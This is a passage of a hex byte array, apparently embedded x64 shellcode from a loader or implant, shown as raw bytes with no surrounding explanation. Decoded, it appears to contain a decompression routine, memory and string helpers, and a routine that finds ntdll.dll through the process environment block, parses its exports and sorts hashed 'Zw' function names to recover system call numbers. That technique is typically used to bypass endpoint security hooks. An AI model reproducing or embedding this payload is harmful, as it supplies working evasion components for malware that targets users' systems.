2065 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48,
2066 0x89, 0xc1, 0xe8, 0x0d, 0x04, 0x00, 0x00, 0x44, 0x8b, 0x45, 0xe0, 0x48,
2067 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8, 0x48,
2068 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48, 0x89, 0x54, 0x24,
2069 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7,
2070 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x9b, 0x0b, 0x00, 0x00, 0xb8, 0x01,
2071 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x90, 0x90, 0x90,
2072 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2073 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10,
2074 0x8b, 0x40, 0x14, 0x8d, 0x48, 0xff, 0x48, 0x8b, 0x55, 0x10, 0x89, 0x4a,
2075 0x14, 0x85, 0xc0, 0x75, 0x2a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x00,
2076 0x48, 0x8d, 0x48, 0x01, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x0a, 0x0f,
2077 0xb6, 0x00, 0x0f, 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x89, 0x50, 0x10,
2078 0x48, 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x14, 0x07, 0x00, 0x00, 0x00, 0x48,
2079 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0xc1, 0xe8, 0x07, 0x83, 0xe0, 0x01,
2080 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0x8d, 0x14,
2081 0x00, 0x48, 0x8b, 0x45, 0x10, 0x89, 0x50, 0x10, 0x8b, 0x45, 0xfc, 0x48,
2082 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x83, 0xec, 0x38, 0x48,
2083 0x8d, 0x6c, 0x24, 0x30, 0x48, 0x89, 0x4d, 0x20, 0xc7, 0x45, 0xfc, 0x01,
2084 0x00, 0x00, 0x00, 0x8b, 0x45, 0xfc, 0x8d, 0x1c, 0x00, 0x48, 0x8b, 0x4d,
2085 0x20, 0xe8, 0x66, 0xff, 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xfc, 0x48,
2086 0x8b, 0x4d, 0x20, 0xe8, 0x58, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x75, 0xdf,
2087 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x38, 0x5b, 0x5d, 0xc3, 0x55, 0x53,
2088 0x48, 0x83, 0xec, 0x58, 0x48, 0x8d, 0x6c, 0x24, 0x50, 0x48, 0x89, 0x4d,
2089 0x20, 0x48, 0x89, 0x55, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x45,
2090 0xd0, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xe4,
2091 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0xff, 0xff, 0xff, 0xff, 0xc7,
2092 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
2093 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x89, 0x45,
2094 0xd0, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x48, 0x01, 0x48, 0x89, 0x4d,
2095 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0xe9, 0x41, 0x02, 0x00, 0x00, 0x48,
2096 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0xdd, 0xfe, 0xff, 0xff, 0x85,
2097 0xc0, 0x0f, 0x84, 0x09, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48,
2098 0x89, 0xc1, 0xe8, 0xc9, 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xf9,
2099 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0xb5,
2100 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x76, 0xc7, 0x45, 0xfc, 0x00, 0x00,
2101 0x00, 0x00, 0xc7, 0x45, 0xe8, 0x04, 0x00, 0x00, 0x00, 0xeb, 0x1b, 0x8b,
2102 0x45, 0xfc, 0x8d, 0x1c, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1,
2103 0xe8, 0x8f, 0xfe, 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xfc, 0x83, 0x6d,
2104 0xe8, 0x01, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0xdf, 0x83, 0x7d, 0xfc, 0x00,
2105 0x74, 0x24, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8,
2106 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
2107 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8,
2108 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x50, 0x01, 0x48, 0x89,
2109 0x55, 0xd8, 0xc6, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2110 0xe9, 0x93, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x50,
2111 0x01, 0x48, 0x89, 0x55, 0xd0, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x89,
2112 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x83, 0xe0, 0x01, 0x83, 0xc0, 0x02, 0x89,
2113 0x45, 0xf8, 0xd1, 0x6d, 0xfc, 0x83, 0x7d, 0xfc, 0x00, 0x74, 0x30, 0xeb,
2114 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8, 0x48,
2115 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0x48,
2116 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8, 0x83,
2117 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0xeb, 0x07, 0xc7,
2118 0x45, 0xec, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xfc, 0x89, 0x45, 0xf4,
2119 0xc7, 0x45, 0xf0, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x20, 0x01, 0x00, 0x00,
2120 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x31, 0xfe, 0xff, 0xff,
2121 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x4e, 0x83, 0x7d, 0xfc,
2122 0x02, 0x75, 0x48, 0x8b, 0x45, 0xf4, 0x89, 0x45, 0xfc, 0x48, 0x8d, 0x45,
2123 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x10, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf8,
2124 0xeb, 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8,
2125 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
2126 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8,
2127 0x83, 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0xe9, 0x90,
2128 0x00, 0x00, 0x00, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x06, 0x83, 0x6d, 0xfc,
2129 0x03, 0xeb, 0x04, 0x83, 0x6d, 0xfc, 0x02, 0xc1, 0x65, 0xfc, 0x08, 0x48,
2130 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x50, 0x01, 0x48, 0x89, 0x55, 0xd0, 0x0f,
2131 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x01, 0x45, 0xfc, 0x48, 0x8d, 0x45, 0xd0,
2132 0x48, 0x89, 0xc1, 0xe8, 0xa5, 0xfd, 0xff, 0xff, 0x89, 0x45, 0xf8, 0x81,
2133 0x7d, 0xfc, 0xff, 0x7c, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf8, 0x01,
2134 0x81, 0x7d, 0xfc, 0xff, 0x04, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf8,
2135 0x01, 0x83, 0x7d, 0xfc, 0x7f, 0x77, 0x2c, 0x83, 0x45, 0xf8, 0x02, 0xeb,
2136 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8, 0x48,
2137 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0x48,
2138 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8, 0x83,
2139 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0x8b, 0x45, 0xfc,
2140 0x89, 0x45, 0xf4, 0xc7, 0x45, 0xf0, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x24,
2141 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x89, 0x45, 0xd0,
2142 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x48, 0x01, 0x48, 0x89, 0x4d, 0xd8,
2143 0x0f, 0xb6, 0x12, 0x88, 0x10, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2144 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0xb5, 0xfd, 0xff, 0xff, 0x48, 0x8b,
2145 0x45, 0xd8, 0x48, 0x2b, 0x45, 0x28, 0x48, 0x83, 0xc4, 0x58, 0x5b, 0x5d,
2146 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
2147 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10,
2148 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x48,
2149 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x10, 0x8b, 0x45, 0x18,
2150 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48, 0x83, 0x45, 0xf8,
2151 0x01, 0x8b, 0x45, 0x20, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x20, 0x85, 0xc0,
2152 0x75, 0xe3, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
2153 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
2154 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10,
2155 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0,
2156 0xeb, 0x17, 0x48, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45,
2157 0xf8, 0x88, 0x10, 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0,
2158 0x01, 0x8b, 0x45, 0x20, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x20, 0x85, 0xc0,
2159 0x75, 0xdc, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
2160 0x55, 0x56, 0x53, 0x48, 0x8d, 0x2c, 0x24, 0x48, 0x89, 0x4d, 0x20, 0x48,
2161 0x89, 0x55, 0x28, 0x44, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48,
2162 0x8b, 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01,
2163 0x0f, 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6,
2164 0x00, 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10,
2165 0x48, 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8,
2166 0xff, 0xff, 0xff, 0xff, 0xeb, 0x19, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
2167 0x12, 0x8b, 0x45, 0x30, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x30, 0x85, 0xc0,
2168 0x75, 0xbb, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e, 0x5d, 0xc3, 0x55,
2169 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
2170 0x23, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18,
2171 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00,
2172 0xeb, 0x2f, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01,
2173 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x0b, 0x48,
2174 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0x48, 0x8b,
2175 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f, 0xb6,
2176 0xc0, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48,
2177 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x31, 0x48, 0x8b, 0x45,
2178 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x38,
2179 0xc2, 0x75, 0x1a, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b,
2180 0x4d, 0x10, 0xe8, 0x74, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x06, 0x48,
2181 0x8b, 0x45, 0x10, 0xeb, 0x15, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x8b,
2182 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc4, 0xb8, 0x00, 0x00,
2183 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
2184 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x1c, 0x48, 0x8b,
2185 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
2186 0x38, 0xc2, 0x75, 0x22, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45,
2187 0x18, 0x01, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
2188 0x0e, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xce,
2189 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f, 0xbe,
2190 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xbe, 0xc8, 0x89,
2191 0xd0, 0x29, 0xc8, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
2192 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x2b, 0x48, 0x8b, 0x45, 0x10, 0x0f,
2193 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x0f,
2194 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x38, 0xc2, 0x74, 0x07, 0xb8, 0x00, 0x00,
2195 0x00, 0x00, 0xeb, 0x2f, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45,
2196 0x18, 0x01, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
2197 0x0b, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xbf,
2198 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0,
2199 0x0f, 0xb6, 0xc0, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
2200 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2201 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0xc7, 0x45, 0xfc, 0x00,
2202 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf8, 0x05, 0x05, 0xc2, 0x26, 0xeb, 0x28,
2203 0x8b, 0x45, 0xfc, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xfc, 0x89, 0xc2, 0x48,
2204 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x89, 0x45,
2205 0xf6, 0x0f, 0xb7, 0x55, 0xf6, 0x8b, 0x45, 0xf8, 0xc1, 0xc8, 0x08, 0x01,
2206 0xd0, 0x31, 0x45, 0xf8, 0x8b, 0x55, 0xfc, 0x48, 0x8b, 0x45, 0x10, 0x48,
2207 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0x8b, 0x45, 0xf8,
2208 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec, 0xc8,
2209 0x00, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x48,
2210 0x89, 0x4d, 0x20, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x85, 0xc0, 0x74,
2211 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x88, 0x03, 0x00, 0x00, 0xc7,
2212 0x85, 0x74, 0xff, 0xff, 0xff, 0x60, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x74,
2213 0xff, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x85, 0x68, 0xff,
2214 0xff, 0xff, 0x48, 0x8b, 0x85, 0x68, 0xff, 0xff, 0xff, 0x48, 0x89, 0x45,
2215 0xd0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45,
2216 0xc8, 0x48, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45,
2217 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8, 0x48, 0x8b, 0x40,
2218 0x10, 0x48, 0x89, 0x45, 0xe8, 0xe9, 0xa1, 0x00, 0x00, 0x00, 0x48, 0x8b,
2219 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b,
2220 0x45, 0xf0, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xc0, 0x8b, 0x40,
2221 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48,
2222 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xb8, 0x48, 0x05, 0x88, 0x00, 0x00,
2223 0x00, 0x48, 0x89, 0x45, 0xb0, 0x48, 0x8b, 0x45, 0xb0, 0x8b, 0x00, 0x89,
2224 0x45, 0xac, 0x83, 0x7d, 0xac, 0x00, 0x74, 0x4c, 0x8b, 0x55, 0xac, 0x48,
2225 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
2226 0x45, 0xf8, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2227 0x01, 0xd0, 0x48, 0x89, 0x45, 0xa0, 0x48, 0x8b, 0x45, 0xa0, 0x8b, 0x00,
2228 0x0d, 0x20, 0x20, 0x20, 0x20, 0x3d, 0x6e, 0x74, 0x64, 0x6c, 0x75, 0x1b,
2229 0x48, 0x8b, 0x45, 0xa0, 0x48, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x0d, 0x20,
2230 0x20, 0x20, 0x20, 0x3d, 0x6c, 0x2e, 0x64, 0x6c, 0x74, 0x24, 0xeb, 0x04,
2231 0x90, 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x00, 0x48,
2232 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x48,
2233 0x85, 0xc0, 0x0f, 0x85, 0x4e, 0xff, 0xff, 0xff, 0xeb, 0x01, 0x90, 0x48,
2234 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
2235 0x6f, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x18, 0x89,
2236 0x45, 0xe4, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48,
2237 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8b,
2238 0x45, 0xf8, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2239 0x01, 0xd0, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40,
2240 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89,
2241 0x45, 0x88, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
2242 0x20, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x89, 0x45, 0x80, 0x8b, 0x45, 0xe4,
2243 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
2244 0x00, 0x48, 0x8b, 0x45, 0x90, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
2245 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x78, 0xff,
2246 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0x00,
2247 0x66, 0x3d, 0x5a, 0x77, 0x75, 0x70, 0x8b, 0x45, 0xe0, 0x48, 0x8d, 0x14,
2248 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x8d, 0x1c,
2249 0x02, 0x48, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8,
2250 0xac, 0xfd, 0xff, 0xff, 0x89, 0x03, 0x8b, 0x45, 0xe4, 0x83, 0xe8, 0x01,
2251 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0x88, 0x48, 0x01,
2252 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
2253 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x98, 0x48, 0x01, 0xd0, 0x8b, 0x55,
2254 0xe0, 0x48, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
2255 0x80, 0x48, 0x01, 0xca, 0x8b, 0x00, 0x89, 0x42, 0x04, 0x83, 0x45, 0xe0,
2256 0x01, 0x81, 0x7d, 0xe0, 0xf4, 0x01, 0x00, 0x00, 0x74, 0x10, 0x83, 0x6d,
2257 0xe4, 0x01, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff,
2258 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x55, 0xe0, 0x89, 0x10,
2259 0xc7, 0x45, 0xdc, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x30, 0x01, 0x00, 0x00,
2260 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0b, 0x01, 0x00, 0x00,
2261 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48,
2262 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xd8,
2263 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x0c, 0xc5, 0x00, 0x00, 0x00,
2264 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x04, 0x39,
2265 0xc2, 0x0f, 0x86, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x48, 0x8d,
2266 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01,
2267 0xd0, 0x8b, 0x00, 0x89, 0x85, 0x60, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xd8,
2268 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80,
2269 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x04, 0x89, 0x85, 0x64, 0xff, 0xff, 0xff,
2270 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5,
2271 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b,
2272 0x55, 0xd8, 0x48, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
2273 0x55, 0x80, 0x48, 0x01, 0xca, 0x8b, 0x00, 0x89, 0x02, 0x8b, 0x45, 0xd8,
2274 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
2275 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xd8, 0x48,
2276 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x80, 0x48,
2277 0x01, 0xca, 0x8b, 0x40, 0x04, 0x89, 0x42, 0x04, 0x8b, 0x45, 0xd8, 0x83,
2278 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00,
2279 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xc2, 0x8b, 0x85, 0x60, 0xff, 0xff,
2280 0xff, 0x89, 0x02, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48,
2281 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48,
2282 0x01, 0xc2, 0x8b, 0x85, 0x64, 0xff, 0xff, 0xff, 0x89, 0x42, 0x04, 0x83,
2283 0x45, 0xd8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x2b, 0x45, 0xdc,
2284 0x83, 0xe8, 0x01, 0x39, 0x45, 0xd8, 0x0f, 0x82, 0xe0, 0xfe, 0xff, 0xff,
2285 0x83, 0x45, 0xdc, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x83, 0xe8,
2286 0x01, 0x39, 0x45, 0xdc, 0x0f, 0x82, 0xbe, 0xfe, 0xff, 0xff, 0xb8, 0x01,
2287 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xc8, 0x00, 0x00, 0x00, 0x5b, 0x5d,
